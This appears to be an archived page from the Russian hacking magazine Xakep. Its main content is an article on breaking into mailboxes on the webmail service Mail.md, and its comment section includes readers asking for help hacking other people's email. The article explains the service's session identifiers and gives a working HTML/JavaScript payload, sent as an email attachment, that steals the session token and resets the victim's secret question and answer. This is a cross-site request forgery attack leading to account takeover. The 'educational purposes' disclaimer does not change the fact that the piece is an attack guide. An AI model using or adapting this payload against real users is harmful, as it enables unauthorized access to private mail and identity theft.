Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter
Журналы Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English
$1000 на Android: зарабатываем на приложениях для мобильной платформы от Google $1000 НА ANDROID: ЗАРАБАТЫВАЕМ НА ПРИЛОЖЕНИЯХ ДЛЯ МОБИЛЬНОЙ ПЛАТФОРМЫ ОТ GOOGLE
27.07.2010

Пара вечеров экспериментов и неожиданно удачная идея позволили за 2 месяца заработать более $1000. Это гораздо больше, чем я мог ожидать...
Фабрика сплоитов ФАБРИКА СПЛОИТОВ
26.07.2010

Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку...

Читаем чужие письма на Mail.md

Для познающего всякое право собственности
теряет силу: или же все есть грабеж и воровство. 
Ф. Ницше 

 

И в начале небольшое предупреждение... Все о чем я сейчас буду рассказывать, наверно преследуется по закону, и вообще аморально, поэтому данная инфа приводится исключительно в образовательных целях, особливо это будет полезно почитать админу вышеуказанного сервера (но ему об этом еще рано знать). 

Итак. Что можно сказать, бросив беглый взгляд на их усилия предоставить своим пользователям конфиденциальность??? Вроде все нормально, но! Для того чтобы сменить пароль на ящик надо знать старый пароль, а для смены секретного вопроса и соответственно ответа на него, нифига знать не надо! (Вот уроды (c) by Брат II). Значит его и будем менять. 

Весь почтовый сервер обслуживает всего одна цгеха, которая имеет звучное название login. Для идентификации пользователя используется такая фигня - никнаме:x:x:x:x:xxxxxxxx:x:x:x:x, где никнаме - имя пользователя, а x-какято цифра. То есть форма отправляет серверу примерно следующее: /cgi-bin/login?sessionid= никнаме:x:x:x:x:xxxxxxxx:x:x:x:x, ну и конечно же поля формы. Если внимательно присмотреться к этим цифрам, можно заметить, что то, что посередине генерируется случайно (и не меняется весь сеанс работы с ящиком), все остальные числа статические, и наверняка что-то для сервера значат. 

От нечего делать я из всех записал, и вот что у меня получилось. В Главном меню:

nickname:0:1:0:6:xxxxxxxx:3:3:1:1 - линк на инбох, 
nickname:0:1:0:6:xxxxxxxx:4:3:1:1 - линк на compose 
nickname:0:1:0:6:xxxxxxxx:11:3:1:1 - линк на addreses 
nickname:0:1:0:6:xxxxxxxx:12:3:1:1 - линк на folders 
nickname:0:1:0:6:xxxxxxxx:6:3:1:1 - линк на options 
nickname:0:1:0:6:xxxxxxxx:14:3:1:1 - линк на logout 
на смену пароля и секретного вопроса -  nickname:0:1:0:6:xxxxxxxx:16:26:1:1 

Я мог бы продолжить и перечислить все остальное, если надо сами глянете, скажу тока пару слов - первое число (сразу после имени) - это номер письма, которое Вы сейчас читаете, второе число - номер папки, в которой вы находитесь (1 по умолчанию - INBOX, 2 - SEND ITEMS, 3 - DELETET ITEMS, ну и т.д) следующая - гуй ее знает что это, но она всегда = 0, потом идет цифра, которая показывает как сортировать письма (1 - by Sender, 3 - by Subject, 7 - by Size и 5 - by Date). Дальше идет рандомное 8-значное число, 2 цифры за ним говорят серверу что мы хотим сделать, и 2 последние всегда = 1 Итак, все что нам надо сделать - узнать эти рандомно генерируемые числа.

Я думаю хватит теории, вот непосредственно атака: создаем у себя на диске файлец и назовем его например part2, в нем пишем следующую муть:

<img src="http://" onmouseover=" 
line1=parent.frames[0].document.links[0]; 
line2=line1.href; 
a3=line2.length; 
a3Ј-7; 
line3=line2.substring(43,a3); 
line3=line3+'16:26:1:1'; 
document.forma.sessionid.value=line3; 
document.forma.submit();"> 
<form name=forma action="/cgi-bin/login" method=post> 
<input type=hidden name="sessionid" value=""> 
<input type=hidden name="questionr" value="vopros"> 
<input type=hidden name="passremin" value="otvet"> 
</form> 

Дальше текст письма и все такое.... Пишем письмецо жертве, и прикрепляем к нему наш файлец part2... Как тока жертва откроет наш атачмент, секретный вопрос на его(ее) ящик поменяется... Всю эту фигню надо слать обязательно в атачменте, потому что по-иному фильтруются теги...





СЛЕДУЮЩИЕ СТАТЬИ
Фаззинг, фаззить, фаззер: ищем уязвимости в программах, сетевых сервисах, драйверах
Гюльчатай, открой личико: получение информации о веб-приложении нетрадиционными способами
JIT Spray против IE8: пишем собственный JIT-эксплойт
Площадка для взлома: головоломки для хакеров
Учимся на ошибках: методика проведения Error-based SQL-Injection
Unserialize баг в картинках: ошибки десериализации классов на живых примерах
GOV сайты под угрозой: взлом сайта Министерства образования и науки Украины
PHP и волшебные методы: сериализация PHP-объектов глазами хакера
Пилим xBtit: нестандартные уязвимости скриптов
Социальный взлом: Pen-testing популярного движка соцсети
ПРЕДЫДУЩИЕ СТАТЬИ
Беспроводные сети: взлом и защита №2
Беспроводные сети: взлом и защита №1
Памятка взломщика или как удержать права root
Reflection SYN флуд атаки
CSS на практике или как был взломан Сombats.ru
HTML: интерпретируем баги
Развитие мысли или грузим файлы бочками
Как была взломана nkb.spb.ru
Фильтруй базар №2
Фильтруй базар №2
ОБСУЖДЕНИЕ СТАТЬИ
Логин:
Пароль:
Регистрации на сервере не требуется, вы можете использовать гостевой доступ.
Если у вас есть форумный логин, вы можете использовать его.
Если нет, то вы можете зарегистрироваться на forum.xakep.ru
Обсуждение этой статьи на forum.xakep.ru
ВСЕ ПОСТЫ ПРОХОДЯТ ПРЕМОДЕРАЦИЮ, не ждите их мгновенного появления в списке комментариев.
Для отправки сообщения введите код, указанный на картинке
Заголовок
Сообщение

Guest Отправлено: 19.08.2007 15:25:37
asdf;  e-mail:
Вообще-то "Нитше" пишется как "НИЦШЕ", блин!
Guest Отправлено: 19.08.2007 15:25:37
OMEN13;  e-mail:
MD = Must Die, поэтому mail.MD = mail.MustDie. Позорный домен.
Guest Отправлено: 19.08.2007 15:25:37
Шушпанчик;  e-mail:
а с чего вы взяли, что эпиграф принадлежит Ницше? Может, "Нитше" - это такой псевдоним у автора
Guest Отправлено: 19.08.2007 15:25:37
XXL;  e-mail: florenawooman@rambler.ru
Ничего не поняла, но очень бы хотела вскрыть ящик одного долбо..а. Не с целью сделать плохо, а с целью взять за нос и ткнуть. Рассказал бы подробнее что делать то?
Guest Отправлено: 19.08.2007 15:25:37
FWD;  e-mail:
2 OMEN13: Сам ты позорный, а знаешь как расшифровывается OMEN - Obscene Man which Enjoys Nobody.
Guest Отправлено: 19.08.2007 15:25:37
{Slayers}Sniper;  e-mail:
Не че не понятно просто отстой
Guest Отправлено: 19.08.2007 15:25:37
Oleg;  e-mail: fondmolodegi@mail.ru
Ребята, знаю, что вы самые умные - помогите, у меня был всегда бесплатный почтовый ящик на hotmail@com.? но что-то прозошло и он у меня не открывается. Что делать, у меня там очень важная информация - заплачу, помогите и срочно. Спасибо.
Guest Отправлено: 19.08.2007 15:25:37
Andrey;  e-mail: umka_ua@rambler.ru
Ребята , как взломать почту ,помогите !!!! А то у вас там не очень понятно написано ....!!!!
Guest Отправлено: 19.08.2007 15:25:37
миша;  e-mail:
а в принципе так ведь можно взломать почти любой е-мэил если знать какие там номера (1 2 3)
Страницы: < 1 2 3 4 >






Keywords: zPOSTz zHACKz, zINFOz, zINTERNETz z16300z
Для Авторов: edit Lock delete Lock



    Rambler's Top100